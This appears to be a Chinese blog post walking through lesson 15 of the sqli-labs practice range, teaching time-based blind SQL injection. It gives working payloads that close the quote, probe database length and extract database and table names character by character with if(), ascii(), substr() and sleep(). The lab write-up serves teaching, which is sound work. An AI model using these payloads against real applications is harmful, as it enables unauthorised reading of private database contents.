SQL 时间盲注 (injection 第十五关)

简介

SQL注入(SQL Injection)是一种常见的网络攻击方式,通过向SQL查询中插入恶意的SQL代码,攻击者可以操控数据库,SQL注入是一种代码注入攻击,其中攻击者将恶意的SQL代码插入到应用程序的输入字段中,然后这些输入被传递到数据库服务器上执行。攻击者可以利用这一漏洞执行任意的SQL查询或命令,从而访问或操控数据库中的敏感信息。

SQL注入的一个简要流程:

1、打开目标靶场

2、选择less - 15

3、确定网站可以注入的参数

本关可以直接在输入框中搜索

4、判断闭合方式

本关为 1' #

5、确定字段列数

使用 order by

若页面正常,则存在1列,输入 1' and if(length(database())>7,sleep(5),1) #

发现有时间延迟,则数据库长度大于7

最终确定数据库长度为8

6、确定数据名称

可以输入以下代码

1' and if(ascii(substr(database(),1,1))>114,sleep(5),1) #

以此可以确定第一个字符的ASCII码值为115,字母为s

7、查询数据库中第一张表

查询第一张表的第一个字符

1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100,sleep(5),1) #

有延时则大于100

最终可以确定第一位字符ascii码为101,确定为字母e

按照此法依次可以得出最终自己想要的数据内容!!!

安全

网络是把双刃剑,安全使用是关键

​​​​​​​

相关推荐
无限的鲜花8 小时前
反射(原创推荐)
java·开发语言
运维行者_9 小时前
企业无线网络监控的挑战与智能化演进趋势
大数据·运维·服务器·网络·数据库
yongche_shi9 小时前
ragas官方文档中文版(五十)
开发语言·python·ai·ragas·如何评估和改进 rag 应用
一路向北he9 小时前
字节钢铁军团--“提供情境,而非控制”
java·开发语言·前端
国强_dev9 小时前
技术探讨:使用 stunnel 加密转发数据库连接时,如何获取客户端真实 IP?
数据库·网络协议·tcp/ip
@insist1239 小时前
系统规划与管理师-信息系统规划核心工作要点解析
数据库·软考·系统规划与管理师·软件水平考试·系统规划与管理工程师
超级数据查看器9 小时前
超级数据查看器 v10.0 发布
java·大数据·数据库·sqlite·安卓
数安3000天10 小时前
增量数据如何自动分类分级,避免目录“过期“?
大数据·数据库
AI行业学习10 小时前
Notepad++ 官方下载 + 完整安装 + 全套优化配置(2026最新)
开发语言·人工智能·python·前端框架·html·notepad++
Coder_Shenshen11 小时前
西门子S7CommPlus协议鉴权算法原理与流程详解
网络·后端·算法